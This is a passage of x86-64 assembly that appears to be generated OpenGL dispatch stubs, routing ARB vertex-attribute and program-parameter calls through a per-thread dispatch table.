movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3672(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramLocalParameter4fARB), .-GL_PREFIX(ProgramLocalParameter4fARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramLocalParameter4fvARB)
.type GL_PREFIX(ProgramLocalParameter4fvARB), @function
GL_PREFIX(ProgramLocalParameter4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3680(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3680(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3680(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3680(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramLocalParameter4fvARB), .-GL_PREFIX(ProgramLocalParameter4fvARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramStringARB)
.type GL_PREFIX(ProgramStringARB), @function
GL_PREFIX(ProgramStringARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3688(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3688(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3688(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3688(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramStringARB), .-GL_PREFIX(ProgramStringARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1dARB)
.type GL_PREFIX(VertexAttrib1dARB), @function
GL_PREFIX(VertexAttrib1dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3696(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3696(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3696(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3696(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1dARB), .-GL_PREFIX(VertexAttrib1dARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1dvARB)
.type GL_PREFIX(VertexAttrib1dvARB), @function
GL_PREFIX(VertexAttrib1dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3704(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3704(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3704(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3704(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1dvARB), .-GL_PREFIX(VertexAttrib1dvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1fARB)
.type GL_PREFIX(VertexAttrib1fARB), @function
GL_PREFIX(VertexAttrib1fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3712(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3712(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3712(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3712(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1fARB), .-GL_PREFIX(VertexAttrib1fARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1fvARB)
.type GL_PREFIX(VertexAttrib1fvARB), @function
GL_PREFIX(VertexAttrib1fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3720(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3720(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3720(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3720(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1fvARB), .-GL_PREFIX(VertexAttrib1fvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1sARB)
.type GL_PREFIX(VertexAttrib1sARB), @function
GL_PREFIX(VertexAttrib1sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3728(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3728(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3728(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3728(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1sARB), .-GL_PREFIX(VertexAttrib1sARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib1svARB)
.type GL_PREFIX(VertexAttrib1svARB), @function
GL_PREFIX(VertexAttrib1svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3736(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3736(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3736(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3736(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib1svARB), .-GL_PREFIX(VertexAttrib1svARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2dARB)
.type GL_PREFIX(VertexAttrib2dARB), @function
GL_PREFIX(VertexAttrib2dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3744(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3744(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3744(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3744(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2dARB), .-GL_PREFIX(VertexAttrib2dARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2dvARB)
.type GL_PREFIX(VertexAttrib2dvARB), @function
GL_PREFIX(VertexAttrib2dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3752(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3752(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3752(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3752(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2dvARB), .-GL_PREFIX(VertexAttrib2dvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2fARB)
.type GL_PREFIX(VertexAttrib2fARB), @function
GL_PREFIX(VertexAttrib2fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3760(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3760(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3760(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $24, %rsp
movq 3760(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2fARB), .-GL_PREFIX(VertexAttrib2fARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2fvARB)
.type GL_PREFIX(VertexAttrib2fvARB), @function
GL_PREFIX(VertexAttrib2fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3768(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3768(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3768(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3768(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2fvARB), .-GL_PREFIX(VertexAttrib2fvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2sARB)
.type GL_PREFIX(VertexAttrib2sARB), @function
GL_PREFIX(VertexAttrib2sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3776(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3776(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3776(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3776(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2sARB), .-GL_PREFIX(VertexAttrib2sARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib2svARB)
.type GL_PREFIX(VertexAttrib2svARB), @function
GL_PREFIX(VertexAttrib2svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3784(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3784(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3784(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3784(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib2svARB), .-GL_PREFIX(VertexAttrib2svARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3dARB)
.type GL_PREFIX(VertexAttrib3dARB), @function
GL_PREFIX(VertexAttrib3dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3792(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3792(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3792(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3792(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3dARB), .-GL_PREFIX(VertexAttrib3dARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3dvARB)
.type GL_PREFIX(VertexAttrib3dvARB), @function
GL_PREFIX(VertexAttrib3dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3800(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3800(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3800(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3800(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3dvARB), .-GL_PREFIX(VertexAttrib3dvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3fARB)
.type GL_PREFIX(VertexAttrib3fARB), @function
GL_PREFIX(VertexAttrib3fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3808(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3808(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3808(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3808(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3fARB), .-GL_PREFIX(VertexAttrib3fARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3fvARB)
.type GL_PREFIX(VertexAttrib3fvARB), @function
GL_PREFIX(VertexAttrib3fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3816(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3816(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3816(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3816(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3fvARB), .-GL_PREFIX(VertexAttrib3fvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3sARB)
.type GL_PREFIX(VertexAttrib3sARB), @function
GL_PREFIX(VertexAttrib3sARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3824(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3824(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3824(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3824(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3sARB), .-GL_PREFIX(VertexAttrib3sARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib3svARB)
.type GL_PREFIX(VertexAttrib3svARB), @function
GL_PREFIX(VertexAttrib3svARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3832(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3832(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib3svARB), .-GL_PREFIX(VertexAttrib3svARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NbvARB)
.type GL_PREFIX(VertexAttrib4NbvARB), @function
GL_PREFIX(VertexAttrib4NbvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3840(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NbvARB), .-GL_PREFIX(VertexAttrib4NbvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NivARB)
.type GL_PREFIX(VertexAttrib4NivARB), @function
GL_PREFIX(VertexAttrib4NivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3848(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NivARB), .-GL_PREFIX(VertexAttrib4NivARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NsvARB)
.type GL_PREFIX(VertexAttrib4NsvARB), @function
GL_PREFIX(VertexAttrib4NsvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3856(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NsvARB), .-GL_PREFIX(VertexAttrib4NsvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NubARB)
.type GL_PREFIX(VertexAttrib4NubARB), @function
GL_PREFIX(VertexAttrib4NubARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _x86_64_get_dispatch@PLT
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3864(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
call _glapi_get_dispatch
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NubARB), .-GL_PREFIX(VertexAttrib4NubARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NubvARB)
.type GL_PREFIX(VertexAttrib4NubvARB), @function
GL_PREFIX(VertexAttrib4NubvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3872(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NubvARB), .-GL_PREFIX(VertexAttrib4NubvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NuivARB)
.type GL_PREFIX(VertexAttrib4NuivARB), @function
GL_PREFIX(VertexAttrib4NuivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3880(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NuivARB), .-GL_PREFIX(VertexAttrib4NuivARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4NusvARB)
.type GL_PREFIX(VertexAttrib4NusvARB), @function
GL_PREFIX(VertexAttrib4NusvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3888(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4NusvARB), .-GL_PREFIX(VertexAttrib4NusvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4bvARB)
.type GL_PREFIX(VertexAttrib4bvARB), @function
GL_PREFIX(VertexAttrib4bvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3896(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4bvARB), .-GL_PREFIX(VertexAttrib4bvARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4dARB)
.type GL_PREFIX(VertexAttrib4dARB), @function
GL_PREFIX(VertexAttrib4dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _x86_64_get_dispatch@PLT
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3904(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %rdi, (%rsp)
movq %xmm0, 8(%rsp)
movq %xmm1, 16(%rsp)
movq %xmm2, 24(%rsp)
movq %xmm3, 32(%rsp)
call _glapi_get_dispatch
movq 32(%rsp), %xmm3
movq 24(%rsp), %xmm2
movq 16(%rsp), %xmm1
movq 8(%rsp), %xmm0
movq (%rsp), %rdi
addq $40, %rsp
movq 3904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(VertexAttrib4dARB), .-GL_PREFIX(VertexAttrib4dARB)
.p2align 4,,15
.globl GL_PREFIX(VertexAttrib4dvARB)
.type GL_PREFIX(VertexAttrib4dvARB), @function
GL_PREFIX(VertexAttrib4dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
